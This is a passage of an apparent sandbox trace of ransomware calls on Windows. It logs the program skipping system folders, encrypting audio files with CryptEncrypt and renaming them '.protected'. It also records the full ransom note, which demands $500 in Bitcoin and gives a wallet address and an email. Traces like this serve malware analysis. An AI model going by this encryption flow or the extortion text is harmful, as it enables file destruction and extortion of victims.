HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\p51dwrs kcbjacu.m4a.protected")) returned 1 [0092.346] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.346] lstrcmpiW (lpString1="S_Y9KCvVsjeCtMDtCE.m4a", lpString2="Windows") returned -1 [0092.346] lstrcmpiW (lpString1="S_Y9KCvVsjeCtMDtCE.m4a", lpString2="Program Files") returned 1 [0092.346] lstrcmpiW (lpString1="S_Y9KCvVsjeCtMDtCE.m4a", lpString2="Program Files (x86)") returned 1 [0092.346] lstrcmpiW (lpString1="S_Y9KCvVsjeCtMDtCE.m4a", lpString2="$Recycle.bin") returned 1 [0092.346] lstrcmpiW (lpString1="S_Y9KCvVsjeCtMDtCE.m4a", lpString2="System Volume Information") returned -1 [0092.346] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a") returned 95 [0092.346] StrStrIW (lpFirst="S_Y9KCvVsjeCtMDtCE.m4a", lpSrch=".protected") returned 0x0 [0092.346] lstrcmpW (lpString1="S_Y9KCvVsjeCtMDtCE.m4a", lpString2="RESTORE_FILES.txt") returned 1 [0092.346] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.346] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\s_y9kcvvsjectmdtce.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a") returned 95 [0092.347] StrStrW (lpFirst="S_Y9KCvVsjeCtMDtCE.m4a", lpSrch=".txt") returned 0x0 [0092.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a") returned 95 [0092.347] StrStrW (lpFirst="S_Y9KCvVsjeCtMDtCE.m4a", lpSrch=".rar") returned 0x0 [0092.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a") returned 95 [0092.347] StrStrW (lpFirst="S_Y9KCvVsjeCtMDtCE.m4a", lpSrch=".zip") returned 0x0 [0092.347] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.348] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.348] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.348] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.348] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.348] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.348] CloseHandle (hObject=0xd8) returned 1 [0092.348] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a.protected") returned 105 [0092.348] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\s_y9kcvvsjectmdtce.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\s_y9kcvvsjectmdtce.m4a.protected")) returned 1 [0092.349] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.349] lstrcmpiW (lpString1="YZNIRiaOOo TXdjUp.mp3", lpString2="Windows") returned 1 [0092.349] lstrcmpiW (lpString1="YZNIRiaOOo TXdjUp.mp3", lpString2="Program Files") returned 1 [0092.349] lstrcmpiW (lpString1="YZNIRiaOOo TXdjUp.mp3", lpString2="Program Files (x86)") returned 1 [0092.349] lstrcmpiW (lpString1="YZNIRiaOOo TXdjUp.mp3", lpString2="$Recycle.bin") returned 1 [0092.349] lstrcmpiW (lpString1="YZNIRiaOOo TXdjUp.mp3", lpString2="System Volume Information") returned 1 [0092.349] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3") returned 94 [0092.349] StrStrIW (lpFirst="YZNIRiaOOo TXdjUp.mp3", lpSrch=".protected") returned 0x0 [0092.349] lstrcmpW (lpString1="YZNIRiaOOo TXdjUp.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0092.349] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.349] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\yzniriaooo txdjup.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3") returned 94 [0092.349] StrStrW (lpFirst="YZNIRiaOOo TXdjUp.mp3", lpSrch=".txt") returned 0x0 [0092.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3") returned 94 [0092.349] StrStrW (lpFirst="YZNIRiaOOo TXdjUp.mp3", lpSrch=".rar") returned 0x0 [0092.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3") returned 94 [0092.349] StrStrW (lpFirst="YZNIRiaOOo TXdjUp.mp3", lpSrch=".zip") returned 0x0 [0092.349] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.350] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.350] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.350] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.350] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.350] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.350] CloseHandle (hObject=0xd8) returned 1 [0092.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3.protected") returned 104 [0092.351] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\yzniriaooo txdjup.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\YZNIRiaOOo TXdjUp.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\yzniriaooo txdjup.mp3.protected")) returned 1 [0092.351] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0092.351] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0092.352] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\RESTORE_FILES.txt") returned 90 [0092.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.352] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.352] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0092.353] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.353] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0092.353] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.353] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0092.353] CloseHandle (hObject=0xd4) returned 1 [0092.354] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.354] lstrcmpiW (lpString1="rQ-vK_eeCyZ60jbHQB_.wav", lpString2="Windows") returned -1 [0092.354] lstrcmpiW (lpString1="rQ-vK_eeCyZ60jbHQB_.wav", lpString2="Program Files") returned 1 [0092.354] lstrcmpiW (lpString1="rQ-vK_eeCyZ60jbHQB_.wav", lpString2="Program Files (x86)") returned 1 [0092.354] lstrcmpiW (lpString1="rQ-vK_eeCyZ60jbHQB_.wav", lpString2="$Recycle.bin") returned 1 [0092.354] lstrcmpiW (lpString1="rQ-vK_eeCyZ60jbHQB_.wav", lpString2="System Volume Information") returned -1 [0092.354] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav") returned 81 [0092.354] StrStrIW (lpFirst="rQ-vK_eeCyZ60jbHQB_.wav", lpSrch=".protected") returned 0x0 [0092.354] lstrcmpW (lpString1="rQ-vK_eeCyZ60jbHQB_.wav", lpString2="RESTORE_FILES.txt") returned 1 [0092.354] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.354] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\rq-vk_eecyz60jbhqb_.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav") returned 81 [0092.354] StrStrW (lpFirst="rQ-vK_eeCyZ60jbHQB_.wav", lpSrch=".txt") returned 0x0 [0092.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav") returned 81 [0092.354] StrStrW (lpFirst="rQ-vK_eeCyZ60jbHQB_.wav", lpSrch=".rar") returned 0x0 [0092.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav") returned 81 [0092.354] StrStrW (lpFirst="rQ-vK_eeCyZ60jbHQB_.wav", lpSrch=".zip") returned 0x0 [0092.355] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.355] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.355] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.356] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.356] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.356] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.356] CloseHandle (hObject=0xd4) returned 1 [0092.360] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav.protected") returned 91 [0092.360] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\rq-vk_eecyz60jbhqb_.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\rQ-vK_eeCyZ60jbHQB_.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\rq-vk_eecyz60jbhqb_.wav.protected")) returned 1 [0092.361] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.361] lstrcmpiW (lpString1="TibvjXvcLs9Jt8MAnMRR.wav", lpString2="Windows") returned -1 [0092.361] lstrcmpiW (lpString1="TibvjXvcLs9Jt8MAnMRR.wav", lpString2="Program Files") returned 1 [0092.361] lstrcmpiW (lpString1="TibvjXvcLs9Jt8MAnMRR.wav", lpString2="Program Files (x86)") returned 1 [0092.361] lstrcmpiW (lpString1="TibvjXvcLs9Jt8MAnMRR.wav", lpString2="$Recycle.bin") returned 1 [0092.361] lstrcmpiW (lpString1="TibvjXvcLs9Jt8MAnMRR.wav", lpString2="System Volume Information") returned 1 [0092.361] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav") returned 82 [0092.361] StrStrIW (lpFirst="TibvjXvcLs9Jt8MAnMRR.wav", lpSrch=".protected") returned 0x0 [0092.361] lstrcmpW (lpString1="TibvjXvcLs9Jt8MAnMRR.wav", lpString2="RESTORE_FILES.txt") returned 1 [0092.361] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.361] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\tibvjxvcls9jt8manmrr.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.361] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav") returned 82 [0092.361] StrStrW (lpFirst="TibvjXvcLs9Jt8MAnMRR.wav", lpSrch=".txt") returned 0x0 [0092.361] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav") returned 82 [0092.361] StrStrW (lpFirst="TibvjXvcLs9Jt8MAnMRR.wav", lpSrch=".rar") returned 0x0 [0092.361] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav") returned 82 [0092.361] StrStrW (lpFirst="TibvjXvcLs9Jt8MAnMRR.wav", lpSrch=".zip") returned 0x0 [0092.362] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.362] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.362] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.363] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.363] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.363] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.363] CloseHandle (hObject=0xd4) returned 1 [0092.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav.protected") returned 92 [0092.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\tibvjxvcls9jt8manmrr.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\TibvjXvcLs9Jt8MAnMRR.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\tibvjxvcls9jt8manmrr.wav.protected")) returned 1 [0092.365] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.365] lstrcmpiW (lpString1="Xi29XN5DxSvIHVKOBV.wav", lpString2="Windows") returned 1 [0092.365] lstrcmpiW (lpString1="Xi29XN5DxSvIHVKOBV.wav", lpString2="Program Files") returned 1 [0092.365] lstrcmpiW (lpString1="Xi29XN5DxSvIHVKOBV.wav", lpString2="Program Files (x86)") returned 1 [0092.365] lstrcmpiW (lpString1="Xi29XN5DxSvIHVKOBV.wav", lpString2="$Recycle.bin") returned 1 [0092.365] lstrcmpiW (lpString1="Xi29XN5DxSvIHVKOBV.wav", lpString2="System Volume Information") returned 1 [0092.365] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 